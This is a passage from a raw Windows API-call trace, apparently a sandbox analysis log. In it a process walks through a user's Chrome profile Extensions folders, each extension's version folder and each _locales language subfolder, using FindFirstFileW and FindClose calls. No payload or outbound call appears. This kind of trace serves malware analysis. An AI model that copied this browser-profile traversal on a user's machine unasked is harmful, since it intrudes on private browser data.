HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.198] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.198] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.198] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.205] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.205] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.205] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.205] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.205] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.205] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.389] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.389] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.389] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.389] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.389] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.389] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0145.533] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0145.533] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.533] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0145.533] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0145.533] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.534] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0145.569] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0145.569] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.569] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0145.570] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0145.570] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.570] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0145.574] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0145.574] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.574] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0145.574] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0145.574] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\*", lpFindFileData=0x2b4dac8 | out: lpFindFileData=0x2b4dac8) returned 0xa327e8 [0145.574] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0145.574] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0145.574] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0145.574] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0145.575] FindClose (in: hFindFile=0xa32ce8 | out: hFindFile=0xa32ce8) returned 1 [0145.575] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0145.576] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\*", lpFindFileData=0x2b4dfd0 | out: lpFindFileData=0x2b4dfd0) returned 0xa32ce8 [0145.576] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\*", lpFindFileData=0x2b4dd4c | out: lpFindFileData=0x2b4dd4c) returned 0xa32968 [0145.579] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\*", lpFindFileData=0x2b4dac8 | out: lpFindFileData=0x2b4dac8) returned 0xa327e8 [0145.712] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0145.712] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0145.712] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.712] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0145.869] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0145.869] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.869] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0145.870] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0145.870] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.870] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0145.912] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0145.913] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.913] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0145.913] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0145.913] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.913] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0145.942] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0145.942] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.942] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0145.942] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0145.942] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.942] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0145.943] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0145.943] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.943] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0145.943] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0145.944] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.944] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0145.944] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0145.944] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.944] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0145.945] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0145.945] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.945] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0145.945] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0145.946] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.946] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0145.946] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0145.946] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.946] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0145.947] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0145.947] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.947] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0145.947] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0145.949] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.949] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0145.950] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0145.950] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.950] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0145.950] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0145.950] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.950] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0145.951] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0145.951] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.951] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0145.951] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0145.951] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.951] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0145.992] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0145.992] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.992] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0145.992] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0145.993] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.993] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0147.340] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0147.340] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0147.340] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0147.341] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0147.341] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0147.341] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0147.451] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0147.451] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0147.451] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0147.451] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0147.452] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0147.452] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0147.454] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0147.454] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0147.454] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0147.454] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0147.454] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0147.454] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0147.569] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0147.569] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0147.569] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0147.569] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0147.569] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0147.569] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0147.584] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0147.585] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0147.585] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0147.585] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0147.585] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0147.585] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0147.586] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0147.586] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0147.586] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0147.586] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0147.586] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0147.586] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0147.587] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0147.587] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0147.587] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0147.587] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0147.587] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0147.587] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0147.588] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0147.588] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0147.588] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 